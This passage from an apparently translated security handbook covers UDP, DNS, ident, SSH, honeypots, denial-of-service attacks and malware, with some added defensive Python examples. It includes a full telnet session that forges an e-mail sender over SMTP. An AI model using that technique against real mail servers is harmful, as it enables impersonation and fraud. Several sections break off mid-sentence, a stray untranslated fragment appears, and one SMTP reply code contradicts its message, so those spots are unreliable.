As with TCP, UDP packets are sent from a port on the sending host to a port on the receiving host. Each UDP packet also contains user data. If a program is listening on that particular port and is ready to receive the packet, the packet will be received. If no program is listening on that port, the packet is ignored and the receiving host sends an ICMP error message. If a program is listening on the port but is not ready to receive the packet, the packet can wait in a queue until it is eventually received or lost.
Unlike TCP packets, a UDP packet can be broadcast on broadcast networks, which means that it can be sent to a particular port on all the hosts on the same local network. Broadcast packets are occasionally used for services such as announcing the time of day.
Ports are identified by 16-bit numbers. Table 5-B shows some of the ports assigned to a number of common UDP services. UDP services also have security problems and exploitable weaknesses, and as in the previous table the type of risk is noted next to each of them.
The security concerns of UDP services are classified as follows:
A. The service can be abused remotely to launch a denial-of-service attack;
B. The protocol requires the password to be transmitted over the Internet in plaintext, without any encryption; and
C. The service is usually configured to use IP addresses for authentication, and this is exposed to the threat of spoofing and other similar kinds of attacks.
Clients and Servers
The Internet Protocol is based on the client/server model. Programs called clients open connections over the network to other programs called servers, and the servers wait for these connections to be made. One example of a client/server pair is the network time system. The client program is the program that asks the network server for the time. The server program is the program that waits for these requests and reports the correct time. In the Unix world, server programs that run in the background and wait for user requests are known as daemons, and in the Microsoft world these programs are called services.
With the telnet program you can connect to any port of a computer. [292] For example, you can connect to port 25 (the SMTP port) and send a forged e-mail message without using the regular e-mail program:
% telnet control.mil 25
Trying 45.1.12.2 ...
Connected to hq.control.mil.
Escape character is '^]'.
220 hq.control.mil ESMTP Sendmail 8.11.6/8.11.6; Sun, 18 Aug 2002 21:21:03 -0500
HELO kaos.org
250 hq.control.mil Hello kaos.org, pleased to meet you
MAIL FROM:<agent86@control.mil>
250 <agent86>... Sender ok
RCPT TO:<agent99@control.mil>
550 <agent99>... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
To: agent99
From: Max <agent86>
Subject: tonight
99, I know I was supposed to take you out to dinner tonight, but I have been captured by KAOS
agents, and they
won't let me out until they finish torturing me. I hope you understand. Love, Max
.
250 UAA01441 Message accepted for delivery
QUIT
A "hostname" is the name assigned to a computer on the Internet. Hostnames make the Internet easier for users, because they are much easier to remember than IP addresses. It is also possible to change a computer's IP address while keeping its hostname the same. A hostname can belong to more than one IP address, and an IP address can have more than one hostname. These two facts have profound consequences for anyone who wants to write secure network programs.
292 This program was originally used for logging in to systems remotely, but because it sends the password unencrypted, this use of telnet is no longer recommended at all.
A hostname must begin with a letter or a digit, and may then contain letters, digits and certain symbols such as the hyphen [293]. Upper-case and lower-case letters are not distinguished in hostnames. An example of a hostname is tock.cerias.purdue.edu. [294]
Every hostname consists of two parts: the name of the computer and the name of its domain. The computer's name is the name to the left of the first dot, and the domain name is everything to the right of that dot. In the previous example the computer's name is tock and its domain name is cerias.purdue.edu. If the domain name itself contains dots, it represents a hierarchy of domains. For example, cerias.purdue.edu denotes the domain of the CERIAS center, which forms part of the Purdue University domain, which in turn is part of the top-level domain for educational institutions (edu).
In the early days of the Internet, the names and addresses of all Internet computers were kept in a single file. But as the file grew to thousands of lines, and as changes to the list of names gradually became a daily event, keeping it up to date became practically impossible, and it was replaced by a distributed, network-based name service called the Domain Name Service (DNS).
DNS implements a distributed database for translating hostnames to IP addresses and back, and for performing related operations. The software uses the network to translate each part of the hostname separately. For example, to translate the name girigiri.gbrmpa.gov.au, a computer first looks up the address of a root name server (which is usually stored in a file) and asks it for the address of the server for the au top-level domain. The computer then asks the au domain's server about the address of gov.au, and once it has found that computer, asks it for the address of gbrmpa.gov.au, and finally asks the server of the gbrmpa.gov.au domain for the address of the computer girigiri.gbrmpa.gov.au. Various caching techniques are also used in the process of translating hostnames to IP addresses in order to reduce overall network traffic.
DNS lookups of hostnames are usually carried out with UDP packets, but DNS also uses TCP for some of its operations.
IP Security
The Internet protocols, and IP itself, are vulnerable to many kinds of attack, including password guessing, social engineering, software bugs, network sniffing, packet spoofing, data tampering, connection hijacking and denial-of-service attacks. Many of these attacks were predicted years before they occurred in practice, and yet these protocols still have no adequate means of protecting against them.
IP was not designed to provide security and is not resistant to deliberate attacks, but the security of IP networks can be increased with a variety of techniques. Some of these techniques are program access controls, encryption, advanced authentication systems, SSH, and the use of decoy systems (honeypots). Each of these is described in detail below. In addition, measures such as firewalls (explained earlier), hardening of server hosts (examined in Chapter 5 of this Part), and physically separating vulnerable systems from the network can also be used to raise the level of security.
293 Technically, hostnames should not contain underscores, but many systems that map hostnames to IP addresses stubbornly accept the underscore, and Microsoft has made its use mandatory in its Active Directory service, which violates at least one RFC.
294 For more information about hostnames, see RFCs 1122 and 1123.
and so similar concerns exist for them as well. As discussed earlier in this chapter, telephone lines and wireless networks can also be tapped; and in the same way IP transmissions over television lines or power lines can be eavesdropped on.
In short, with most network technologies it is not possible to prevent eavesdropping or even to detect it; one can only assume that network traffic is being eavesdropped on and try to make it useless to the attacker by encrypting it. It should be kept in mind, however, that even when encryption is used, the source and destination addresses and ports can still be discovered by the attacker and used for traffic analysis.
Encryption can help to increase IP security in several ways:
End-to-End Encryption
In this method the sending host encrypts the contents of the packets, and when the packets are received at the other end these contents are decrypted automatically. Organizations that are located at more than one physical site use encrypting routers to connect to the Internet. These routers automatically encrypt the packets that are sent from one of the company's offices to another, in order to prevent eavesdropping by attackers on the Internet (this method is known as a VPN); at the same time, they do not encrypt the packets that are sent from the organization to other sites.
Today this kind of packet-level encryption is generally carried out with the IPsec protocol (described in RFC 2401). IPsec can be used to encrypt transparently all communications between two hosts, between a host and a network, or between two networks. Using IPsec is a powerful way of automatically encrypting the traffic of systems that have no encryption capability of their own.
Authentication systems have been developed for each of these services. DNS supports cryptographic signing of zone data and authentication of name servers with a shared secret key. Mail servers can authenticate valid senders against a database by using SMTP AUTH, and netnews messages can be cryptographically signed with the PGP software. Nevertheless, these systems are not widely used today.
IPsec, described above, also makes authentication possible in similar systems. IP traffic received through such a VPN is very likely to come from the source it claims to come from, but most Internet services do not use a VPN.
ident
Many authentication problems arise because TCP/IP is a protocol for creating communication channels between computers, not between users. When a server receives a TCP/IP connection from a client, it knows the client's IP address. Servers nevertheless have no way of being sure of the name of the person who established the TCP/IP connection.
When TCP/IP was created, no need was felt for a general method of discovering the names of the people who establish TCP/IP connections; this became possible later, through protocols that require a user name (for example SMTP, FTP). As the Internet grew, network administrators found an important reason for learning the names of those who initiate TCP/IP connections, and that reason was simply "accountability". If the administrator of a remote system notices that at 17:00 a user on a computer named fas.harvard.edu attacked their machine, they should be able to trace the attack and identify the user and account responsible for it, so that the user can be disciplined or the account blocked.
The identification protocol lets you do this with a simple callback scheme. When a server wants to learn the real name of the initiator of a TCP/IP connection, it first opens a connection to the ident daemon (identd) on the client computer and sends it a description of the current TCP/IP connection; the remote computer then sends back information about the user who initiated the connection, in the form of a readable file.
In the past, the only information sent in reply to the requesting system was the user's user name, but recent identd implementations can also return an encrypted token. This token can afterwards be decrypted at the remote site, with the cooperation of the site running identd. This prevents the user names of a remote host's users from being disclosed with
identd has mostly been used to identify attackers who launched their attacks from universities or other organizations with large, multi-user Unix systems. Sites with unprivileged users who work interactively on Unix systems should run identd to help trace the user accounts involved in an incident.
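The callback described above, shown as an added example that is not part of the handbook: a parser for the query and reply lines of the ident protocol in the format defined by RFC 1413. The sample replies in the test are constructed, the function and class names are this example's own, and stripping whitespace around the user identifier is a choice made here for logging.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Error tokens RFC 1413 allows an identd to return instead of an identity.
KNOWN_ERRORS = {"INVALID-PORT", "NO-USER", "HIDDEN-USER", "UNKNOWN-ERROR"}


@dataclass
class IdentReply:
    identd_port: int        # port on the host that runs identd (the client machine)
    our_port: int           # port on the host that asked (our server)
    kind: str               # "USERID" or "ERROR"
    opsys: Optional[str]    # "UNIX", "OTHER", ...; None for an error reply
    value: str              # user name, opaque token, or error token
    is_username: bool       # False when the value is an opaque token or an error


def build_query(identd_port: int, our_port: int) -> bytes:
    """Describe the TCP connection we want identified, one line ending in CR LF."""
    for port in (identd_port, our_port):
        if not 1 <= port <= 65535:
            raise ValueError(f"port out of range: {port}")
    return f"{identd_port} , {our_port}\r\n".encode("ascii")


def parse_reply(raw: bytes, asked: tuple) -> IdentReply:
    """Parse one reply line and check it answers the connection we asked about."""
    line = raw.decode("latin-1").rstrip("\r\n")
    if len(line) > 1000 or "\x00" in line:
        raise ValueError("oversized or malformed ident reply")
    # At most three splits: a user identifier may itself contain ':'.
    fields = line.split(":", 3)
    if len(fields) < 3:
        raise ValueError("too few fields in ident reply")
    match = re.fullmatch(r"\s*(\d{1,5})\s*,\s*(\d{1,5})\s*", fields[0])
    if not match:
        raise ValueError("bad port pair in ident reply")
    ports = (int(match.group(1)), int(match.group(2)))
    if ports != tuple(asked):
        raise ValueError("reply describes a different connection")
    kind = fields[1].strip().upper()
    if kind == "ERROR":
        token = ":".join(fields[2:]).strip()
        if token not in KNOWN_ERRORS and not token.startswith("X"):
            raise ValueError(f"unknown ident error token: {token!r}")
        return IdentReply(ports[0], ports[1], "ERROR", None, token, False)
    if kind == "USERID" and len(fields) == 4:
        # The opsys field may carry a character set after a comma.
        opsys = fields[2].split(",")[0].strip().upper()
        value = fields[3].strip()
        # With opsys OTHER the value is an unformatted string (for example an
        # encrypted token that only the remote site can map back to an account).
        return IdentReply(ports[0], ports[1], "USERID", opsys, value, opsys != "OTHER")
    raise ValueError(f"unrecognised ident reply type: {kind!r}")


def audit_note(remote_host: str, reply: IdentReply) -> str:
    """Text for an audit log entry; the identity is whatever the remote identd reported."""
    if reply.kind == "ERROR":
        return f"ident {remote_host}: no identity ({reply.value})"
    label = "user" if reply.is_username else "token"
    return f"ident {remote_host}: {label}={reply.value} (reported by remote identd)"


if __name__ == "__main__":
    # Constructed reply for a connection from port 6193 on the client to port 23 here.
    sample = b"6193, 23 : USERID : UNIX : stjohns\r\n"
    print(audit_note("fas.harvard.edu", parse_reply(sample, (6193, 23))))
```

A token returned with the OTHER type has to be recorded verbatim, because only the site running identd can turn it back into an account name.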
It is assumed that every host running an SSH server has its own RSA public/private key pair (called the SSH host key[298]). Version 2 servers also have a second key pair, called the "host DSA key", which uses the DSA encryption algorithm. Most SSH startup scripts generate this key automatically the first time the server is started, if it does not already exist.
When an SSH client connects to a server, the server presents its public key. This key has two uses. First, the client uses it to encrypt the information it sends to the server during authentication; second, it serves as the server's proof of identity. Every time a client connects, the server presents the same public key, so on each connection the client can tell that it is talking to the same server as before.
The host key protects against two kinds of attack. First, it assures you that you are communicating with the correct host. If the host you intend to contact has changed its IP address or has a new DNS name (or if someone has attacked your DNS system and it is handing out incorrect IP addresses), the SSH client notices that the new host has a host key different from that of the old address, and you then know that you should not enter your password. Second, the host key assures you that you will have an encrypted, direct connection to the remote server and that no computer along the path can carry out a "man-in-the-middle" attack. To carry out such an attack successfully, the attacker has to use his own public key - a public key for which he holds the corresponding private key.
Unfortunately, host keys seem to change on a regular basis - sometimes when a new operating system is installed, or when a new installation of SSH mistakenly generates a new host key instead of keeping and using the previous one. So whenever the host key of the server you are connecting to changes, you should not immediately conclude that the server has been compromised or that a "man-in-the-middle" attack is under way; rather, you should find out why the key changed.
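The host-key comparison described above, as an added example that is not part of the handbook: it reads plain (unhashed) known_hosts-style lines, compares the key a server presents with the pinned one, and reports a changed key together with both fingerprints so that the reason for the change can be looked into. The host names, address and key blobs are constructed placeholders rather than real keys; ssh-rsa and ssh-dss are the OpenSSH names for RSA and DSA host keys.

```python
import base64
import hashlib

# Constructed stand-ins for key blobs; real entries hold the encoded public key.
KEY_A = base64.b64encode(b"constructed host key A").decode("ascii")
KEY_B = base64.b64encode(b"constructed host key B").decode("ascii")

SAMPLE_KNOWN_HOSTS = f"""
# constructed sample in known_hosts layout: names, key type, base64 key
gw.example.org,192.0.2.10 ssh-rsa {KEY_A}
files.example.org ssh-rsa {KEY_B}
"""


def fingerprint(key_b64: str) -> str:
    """SHA-256 fingerprint written the way OpenSSH prints it."""
    digest = hashlib.sha256(base64.b64decode(key_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


def load_known_hosts(text: str) -> dict:
    """Map each host name or address to {key type: base64 key}."""
    known = {}
    for line in text.splitlines():
        line = line.strip()
        # Comments, @-marker lines and hashed host names are outside this example.
        if not line or line[0] in "#@|":
            continue
        fields = line.split()
        if len(fields) < 3:
            continue
        names, key_type, key_b64 = fields[:3]
        for name in names.split(","):
            known.setdefault(name, {})[key_type] = key_b64
    return known


def other_names_for_key(known: dict, key_b64: str, host: str) -> list:
    """Other pinned names that already use this key (a renamed or re-addressed host)."""
    return sorted(name for name, keys in known.items()
                  if name != host and key_b64 in keys.values())


def check_host_key(known: dict, host: str, key_type: str, key_b64: str):
    """Return (verdict, detail) for the key a server has just presented."""
    presented = fingerprint(key_b64)
    seen_as = other_names_for_key(known, key_b64, host)
    hint = f"; same key is pinned for {', '.join(seen_as)}" if seen_as else ""
    record = known.get(host)
    if record is None:
        return "unknown-host", f"first contact, presented {presented}{hint}"
    pinned = record.get(key_type)
    if pinned is None:
        return "new-key-type", f"no {key_type} key pinned, presented {presented}{hint}"
    if pinned == key_b64:
        return "match", presented
    # Do not send a password yet: establish why the key differs first.
    return "changed", f"pinned {fingerprint(pinned)}, presented {presented}{hint}"


if __name__ == "__main__":
    table = load_known_hosts(SAMPLE_KNOWN_HOSTS)
    print(check_host_key(table, "gw.example.org", "ssh-rsa", KEY_B))
```

A "changed" verdict is the point at which to ask the server's administrator, over a separate channel, whether the machine was reinstalled and what the new fingerprint should be.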
When a client connects to an SSH server, the client supplies the user name of the account it wants to use and then presents an authentication credential to prove that claim. If the server finds the credential valid, it creates a shell for that user and logs the user into it.
SSH has several security methods[299] for authenticating clients to the server's operating system:
• Clients can present a valid password for the account on the remote server. This password is not transmitted in clear text.
• Clients can use public-key cryptography to prove their identity. In this case the client must present a public key that is present in the client's authorized keys file, and the client must be able to decrypt information that has been encrypted with that key.
• Clients can be authenticated using Kerberos, one-time passwords, or other challenge/response systems available on the server.
SSH can set up a TCP connection as a tunnel between the server and a second client. First the SSH client is used to establish a connection to the SSH server on the remote machine and to send a request to create a tunnel to another port on that machine. If authentication of the SSH client succeeds and its connection is established, the client waits on a new port on its own host; the SSH server establishes a connection to the second server on the remote machine; the second client is directed to connect to the new port on the local host, and data received on this new port is carried by SSH to the sshd server, which in turn sends the data on to the second remote server.
Some protocols cannot be protected with a simple TCP tunnel. For example, protecting FTP requires several tunnels (some of which are hard to predict), so most versions of SSH have a replacement FTP client[300] that works the way users expect FTP to work but uses SSH connections. The X-Windows protocol suffers from similar problems, but most SSH programs have special support for tunneling an X-Windows connection. Instead of the remote X client running against a local X server, SSH creates a virtual X display and a tunnel that the remote client can easily use to communicate with the local server (through SSH).
299 SSH also has less secure methods that work on the basis of the client's IP address; their use should generally be avoided.
300 This client is usually called sftp.
Decoy systems
A new way of dealing with attackers is to set up decoy systems for them to attack instead of the real systems, and decoy systems are therefore usually heavily monitored. Known vulnerabilities are deliberately placed in these systems to increase the likelihood that they will be attacked. Decoy systems, which are sometimes also called "honeypots", have two main advantages:
1. Because decoy systems are heavily monitored, they can be used to identify attackers. With these systems one can obtain the attackers' location, techniques, motivation, skill level, goals, and other information about them.
2. If a decoy system is rich and attractive enough, exploring it may take up so much of the attacker's time that no opportunity is left to attack the real systems.
Decoy systems are not free of risk. Attackers may find something important on these systems. You must be completely sure that there is nothing on the decoy systems that attackers could use to harm you. In particular, a decoy system must not hold any information about your organization. To be sure of this, only new computers can be used as decoy systems. In addition, if the organization has a firewall, the decoy system must be placed outside it.
The second risk of decoy systems is that they may be used as a platform for attacking other computers on the Internet, in which case you will bear civil liability for damage caused to third parties, or even criminal liability for possible conspiracy.
Because of these risks, you should think carefully before setting up any decoy system or honeypot, and preferably also consult a skilled lawyer.
Chapter Eight
Types of Attacks and How to Counter Them
Overview
Many techniques have been used to attack workstations and servers. These techniques generally fall into three distinct categories:
Programmed threats
Another way for an attacker to take over a system is to send a malicious program to the system's users and wait for them to run it. Some of these programs install hidden services that give the attacker remote control of the computer; others replicate and spread from computer to computer.
Social engineering[301]
In a social-engineering attack, the attacker takes advantage of the natural and social traits of the users and administrators of your systems to induce them to reveal secrets or to do things that undermine security.
In this section each of these types of attack is examined separately, together with recommendations for countering it.
Destructive attacks[303]
Such attacks damage or destroy resources so that you can no longer use them. Examples are disabling a disk, and thereby putting the computer out of action, or deleting critical system files.
There are many ways of destroying or corrupting information that can lead to denial of service. By restricting access to critical files and protecting them from unauthorized users, almost all known attacks can be prevented. If you use appropriate security measures to protect the system, you have automatically prevented this kind of destructive attack as well.
Overload attacks[304]
Attacks of this kind place a very heavy load on some system services or consume the entire capacity of some resources, and so prevent others from using those services. The simplest kind of overload is filling up a disk partition, as a result of which users and system programs cannot create new files. Overloading a network can mean bombarding a network server with countless requests so that the server cannot process them, or keeping an organization's Internet connection so busy that no bandwidth remains for sending useful information.
Many modern operating systems have mechanisms for defending against such attacks. You may be able to limit the maximum number of processes and files a user is allowed, the disk space allotted to each user, or even the amount of CPU time each user may consume. Network services can be limited in terms of rate and CPU time. Nevertheless, many systems are still vulnerable to denial-of-service attacks, because the protective settings have generally not been made or have not been applied correctly.
In an "excessive-load" attack (referred to below simply as an "overload attack"), a shared resource or service is kept busy with countless bogus requests, to the point where it cannot respond to the genuine requests of other users. For example, if one user creates a large number of processes, other users will not be able to run their own processes, and if a user fills the disks, other users cannot create new files. By defining and enforcing various limits, including a limit on the disk space users are allowed to use (quota), you can to some extent protect the resources users rely on against overload attacks. You can use physical limits as a kind of quota; for example, divide your computer's resources into different partitions and restrict each user to a single partition. Finally, you can configure systems to detect overload automatically and to reboot the computers when it happens. (Although in doing so you have given the attacker the ability to reboot the computer, which can itself cause other problems.)
... are called "rabbits", because they reproduce very quickly. In general these attacks matter for shared computers, because if a user overloads their own workstation beyond its capacity, it does not matter much as long as nobody else is meant to use it.[306]
The best way to combat overload problems is to train users to use fair resource-sharing mechanisms. If your programs need a great deal of processing and you also have a network of similar computers at your disposal, it is better to use a distributed task scheduling system[307]. Limits and quotas can also be useful, provided the operating system supports them.
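An added illustration, not taken from the handbook, of the per-user ceilings mentioned above as they look on a POSIX system: a job is started with fixed limits on file size, CPU time and open files through Python's standard resource module. The helper names and the limit values are assumptions of this example. The process-count limit is optional here because the kernel counts it per user and does not enforce it for privileged users.

```python
import resource
import subprocess
import sys


def _cap(which, value):
    """Set the soft and hard limit to value, never above the hard limit in force."""
    _, hard = resource.getrlimit(which)
    if hard != resource.RLIM_INFINITY:
        value = min(value, hard)
    resource.setrlimit(which, (value, value))


def run_limited(argv, max_file_bytes, max_cpu_seconds, max_open_files=64,
                max_processes=None, timeout=30):
    """Run argv with ceilings it cannot raise again; return the CompletedProcess."""
    def apply_limits():
        # Executed in the child just before the program starts.
        _cap(resource.RLIMIT_FSIZE, max_file_bytes)    # largest file it may write
        _cap(resource.RLIMIT_CPU, max_cpu_seconds)     # CPU seconds it may consume
        _cap(resource.RLIMIT_NOFILE, max_open_files)   # descriptors it may hold open
        if max_processes is not None:
            _cap(resource.RLIMIT_NPROC, max_processes) # processes owned by this user
    return subprocess.run(argv, preexec_fn=apply_limits,
                          capture_output=True, timeout=timeout)


def outcome(result):
    """Summarise how the limited job ended."""
    if result.returncode == 0:
        return "completed"
    if result.returncode < 0:
        return f"stopped by signal {-result.returncode}"
    return f"failed with exit status {result.returncode}"


if __name__ == "__main__":
    # A job that would spin forever is stopped after one second of CPU time.
    hog = run_limited([sys.executable, "-c", "while True: pass"],
                      max_file_bytes=1 << 20, max_cpu_seconds=1)
    print(outcome(hog))
```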
Disk attacks
Another way of overwhelming a system is to fill up various parts of the disk. If one user fills the whole disk, other users will no longer be able to create new files, in other words to do useful work. Sometimes the disk fills up suddenly, when a program or a user mistakenly creates numerous files. At other times, disks fill up gradually as the space used by users slowly grows.
Most operating systems have commands that help administrators keep track of the disk space used by users and decide which files to delete in order to free up space. One effective way of protecting the system against disk attacks is to use the operating system's disk quota feature (POSIX-based systems usually have this feature). With this feature each user's disk usage can be limited. A disk quota must be set on every partition or file system that users can access. When allocating space to users, do not forget the partitions and directories used for storing e-mail or for the temporary files of processes.
You can also protect your system against this kind of attack by dividing the hard disk into several smaller partitions and placing the home directories of different users on different partitions. Then, if a user completely fills one partition, users of the other partitions are not affected. One drawback of this approach is that if a directory needs more space you have to move it to another partition, and also that, on systems that support hard links[308], you cannot create hard links between the files of several different users.
If you run services on the network that may allow outside users to occupy a large amount of disk space (for example receiving e-mail, or an FTP site with anonymous upload), put them on separate partitions so that other partitions are not exposed to overflow. Temporarily losing the ability to receive e-mail or files is very annoying, but losing all access to the server is intolerable.
Some file systems - especially those used on Unix systems - automatically reserve part of the disk for use by superuser[309] processes. With this feature, the superuser can log in and manage the system if the disk fills up. On file systems that lack this feature, you can simulate it by creating a large junk file on the disk, which you delete if you suddenly need free space.
306 For recommendations on recovery after a process attack, see section 24 of the PUIS book.
307 Distributed Task Scheduling System
308 Hard Link
309 Superuser
Service overload
A service is overloaded when a flood of requests arrives over the network at a server daemon on a computer. This flood of requests can arise in various ways, both accidentally and deliberately. It can keep the system so busy processing network requests that it can no longer carry out its other work in the normal way. In this situation many requests are discarded because there is nowhere to store them, and genuine requests are sent again and add to the load on the computer. If a service that causes a new process to be started comes under attack, the system may create so many new processes that no room is left in the process table for useful work. In the same way, the attack may cause that service to take up most of the memory, CPU, or disk space.
The extra load caused by this attack may be the attacker's ultimate goal, or it may be a scheme to conceal an attack somewhere else. For example, the machine that records audit information may be attacked in order to prevent logins and logouts from being recorded in time. This kind of attack may be carried out merely to divert attention or to cut communication lines while another act - for example, planting a bomb in a car - is taking place.
You can use a network monitor to discover the type, and sometimes the source, of overload attacks. A list of machines and their hardware addresses (the address on the ethernet card, not IP addresses) can help you trace the source of the problem - if it is inside your own network. When tracing the problem, disconnecting the network and subnets can help. If your firewall or router has a logging capability, you can quickly find out whether the attack came from inside or outside the network, since the IP address of the packets sent cannot be trusted.
Although you cannot prevent overload attacks, there are many measures you can take to keep the damage to a minimum or to make your system more resistant to them.
Message flooding[310]
Message flooding occurs when a user slows down a system's processing on the network by pouring a large number of network messages at its address, in order to prevent it from operating normally. These messages may be requests for file service or login service, or simple echo requests. Whatever form the flood of messages takes, it causes most of the destination computer's resources to be spent on responding to it. In the worst cases the flood may cause the machine to crash because of errors arising from a lack of memory for storing incoming packets. In that case the attack blocks access to the network servers.
A flooded server may be unable to respond to network messages in time. An attacker can take advantage of this by writing a program that answers messages and requests in place of the server. For example, the attacker can flood an NIS server and then issue replies of their own to NIS requests - especially requests for passwords.
A similar kind of attack is the broadcast storm[311]. By careful and skilful design of network messages, a message can be built that forces every computer receiving it to reply to it or to retransmit it. As a result of this attack the network becomes saturated and unusable. Before the late 1990s, broadcast storms were caused by hardware or software faults in products under development that contained bugs or were wrongly configured, but it is now possible to create a broadcast storm deliberately, and the attacks known as smurf and fraggle are examples of this kind.
Broadcasting wrongly formatted messages can also bring the computers on a network to a halt. If each of the computers is configured to log inappropriate messages to disk, storms can generate so many messages that the clients are unable to do anything except process and log errors.
Here too, having a separate computer for monitoring and splitting the network into several subnets can help in countering this class of problem, although none of these solutions can prevent the problems completely. In addition, some packet-filtering firewalls (hardware or host-based) can reduce the impact of these attacks by means of "connection rate control". The netfilter program in the Linux 2.4 kernel is a good example of this kind of program.
It is very important to configure all firewalls and routers correctly so as to prevent broadcast messages from being sent from unauthorized hosts. It is best to consult the vendor's documentation to find out how to do this. CERT/CC advisory CA-1998-01 (available on its web site) describes the configuration details for many common systems for stopping and preventing such transmissions.
Most attack software that carries out denial-of-service attacks uses random addresses as the source address in order to reduce the chance of the attack being detected. As a result, egress filters on border routers from time to time stop the network's computers from taking part in distributed denial-of-service attacks - and if they nevertheless remain involved in such attacks, they can be traced more easily, because the attack packets will have correct return addresses.
SYN cookies were invented by Daniel Bernstein[315] and are explained in detail at http://cr.yp.to/syncookies.html. BSD and Linux systems include an implementation of SYN cookies. (On Linux systems, however, this option must be enabled explicitly.)
Some operating systems let you change the way half-open connections are stored in the queue. You can increase the length of the queue, or reduce the lifetime of half-open connections. This method is also non-standard in the way it works, and with some vendors using it may require modifying operating system kernel variables. For specific cases, consult the vendor of the products you use.
Malformed-traffic attacks[316]
In the past, bugs in the lower layers of the network caused systems to crash when they encountered a malformed packet or HTTP request. For example, an attack known as the ping of death[317] crashed both Windows and Unix systems on receipt of an ICMP packet that was longer than the permitted size. Many network devices, including print servers, home firewalls, and even routers, have crashed while being probed for IIS or Apache vulnerabilities. In general, the only way to counter malformed traffic is to use a firewall as a proxy and to make sure that systems are up to date.
٣٢٠
DDoSﺭﺍ ﻣﻲﮔﻴﺮﺩ.
DDoS attacks do not need special software. One form of DDoS attack is carried out simply by sending ICMP echo[321] packets with forged source addresses to a large number of computers connected to the Internet, because the replies to those packets are returned to the victim computer. In another method, attempts are simply made to establish a number of TCP connections from non-existent IP addresses. The destination machine has to spend resources on examining these connection attempts, and if the number of such requests exceeds a certain limit, doing so can cripple the machine.
Sometimes a DDoS attack can be overcome by changing the host name and IP address of the machine under attack. If the victim's host name or IP address has been placed inside the code of the attack software, changing them can protect the victim host, and packets sent to the old address are then filtered by the organization's external router or ISP. For example, the Blaster worm in August 2003 was designed to launch a DDoS attack against an address belonging to the Microsoft Windows update service, but because this address had been placed in the program text, Microsoft was easily able to eliminate the threat by changing the IP address of the Windows update site.[322]
Programmed threats
Computers are designed to execute instructions in sequence. These instructions usually do useful things: they calculate values, maintain a database, and communicate with users and other systems. But sometimes these instructions can be inherently destructive or malicious. If the damage done is accidental, the code concerned is called a "software bug". Such bugs are perhaps the most common cause of unexpected program behaviour. But if the destructive instructions come from someone who intended that abnormal behaviour to occur, the instructions are called a "malicious program" or a "programmed threat". Some people use the word malware[324] (malicious software) for such software.
These days most programmed threats arrive over the Internet, as e-mail messages or as a direct attack on a network server. Receiving an e-mail or a direct attack may be a random event (that is, your web server happened to be chosen at random) or a deliberate one, and a targeted attack may mistakenly turn into a random one, or the reverse. Targeted attacks are far more worrying than random attacks, because a motivated attacker will keep on attacking until he succeeds or is stopped.
322 One of the best-known DDoS attacks took place in February 2000 against two popular companies, Yahoo and Amazon. An analysis of "trinoo" (the Trojan that controlled the zombies involved in this attack) can be found at the following address:
http://www.sans.org/newlook/resources/IDFAQ/trinoo.htm
323 This form of attack is 35 years old and is thoroughly well known. Interestingly, vendors still produce software that can be exploited and abused in this way.
324 Malware
Users may become unwitting agents for transmitting viruses, worms, and other threats. By installing an unknown program they may also install a malicious program contained in it. They may run a screen saver that contains a Trojan horse. Of course, most programs obtained from the Internet contain no malicious code at all. Even so, downloading and running programs indiscriminately from untrustworthy sources increases the chance that malicious programs will succeed. You should therefore be very careful when obtaining program source code and script files from outside sources. Highly sensitive offices should avoid running software that does not carry the cryptographic signature of a trusted author. Doing this will not necessarily protect you, but if a problem arises there will be someone you can hold responsible.
If possible, never download compiled executable files; instead, for all the software you need, read and understand the source code (if it is available) before you install a new software package on your system. If at this stage you become suspicious of a piece of software, do not use it, especially if it needs special privileges in order to run. And finally, obtain software only from sources you trust.
Bear in mind that you should not trust the software of any group or commercial company without good reason. Sometimes commercial companies place back doors in their program code to make maintenance or the recovery of forgotten passwords possible, and others build spying tools into their software in order to invade privacy. Although customers are keen to buy software that comes with after-sales service, vendors have little interest in accepting responsibility for the programs they sell. It is therefore best to look for written guarantees for the third-party programs that you buy and install on your computer.
Free software is no safer than commercial software, although it does have the advantage that the source code is available for you to read. Most free and open-source tools are divided into several parts during development and written by several programmers, and new versions of these parts are usually accepted by the other members of the group without close scrutiny; as a result, a malicious programmer can add a small piece of malicious code to the program without the others noticing. Moreover, even if the source code is examined, some of its back doors and subtle behaviours may not be seen - few people know how to review software carefully, and if the reviewer is not really interested in understanding every part of the program, nothing suspicious may be found. Even an independent review may not be enough, because the reviewers may lack the expertise for the job, may make mistakes, or there may even be collusion between the reviewer and the author of the program!
Unfortunately, many downloaded programs are so large that they cannot all be read in any systematic way. Moreover, although many programs can be downloaded as open source, many users choose to download precompiled binaries. There is no way of being sure whether these files, which have been turned into machine language, were actually produced from the source code that is claimed.
As an alternative to review, you can use programs that others have already trusted. This method is not very reliable, because the program may contain a threat that does not materialise for others but does for you, or the threat may even materialise for many people without anyone noticing it.
Under a sound policy, new software should first be installed and tested on non-sensitive systems. This gives you the opportunity to identify a program's problems, incompatibilities, and abnormal behaviour. Do not install a new piece of software first on a live production system, and never run it for the first time with superuser or system administrator access unless you really have no other choice.
If someone inside your organization with sufficient knowledge intends sabotage, that person can use various tools to write back doors, logic bombs[325], and Trojan horses and install them directly on the target system. Your users and employees are a major threat to the security of your system: these people are familiar with the system, know its weak points, and are acquainted with the control and audit systems in place. Authorized users usually have sufficient access to write malicious programs and introduce them into the system. It may sound laughable to say so, but in many organizations the person responsible for security control and auditing is the very person who, if he wished, could inflict the greatest damage on the whole system by running a few commands. Senior system managers, too, are usually not subject to any audit or other kind of check.
Most back doors are placed in programs that, when run, require lengthy procedures for authentication or a great deal of data entry by the user. While debugging the program, the programmer may want to have special access, or to skip the lengthy authentication or data-entry steps. In addition, the programmer may want to have a way of activating the program from within the program itself in case the authentication routines do not work. A back door is a program that is activated either by the entry of a special string or by being run under a special user name, and that grants the desired access.
Back doors become dangerous when they are used by unscrupulous programmers to gain unauthorized access. They also become a problem if the original programmer forgets to remove them after the program is completed and someone else discovers that they exist. Sometimes, too, an attacker who has successfully broken into a system creates a back door in it in order to be able to enter the system again later and obtain administrative privileges.
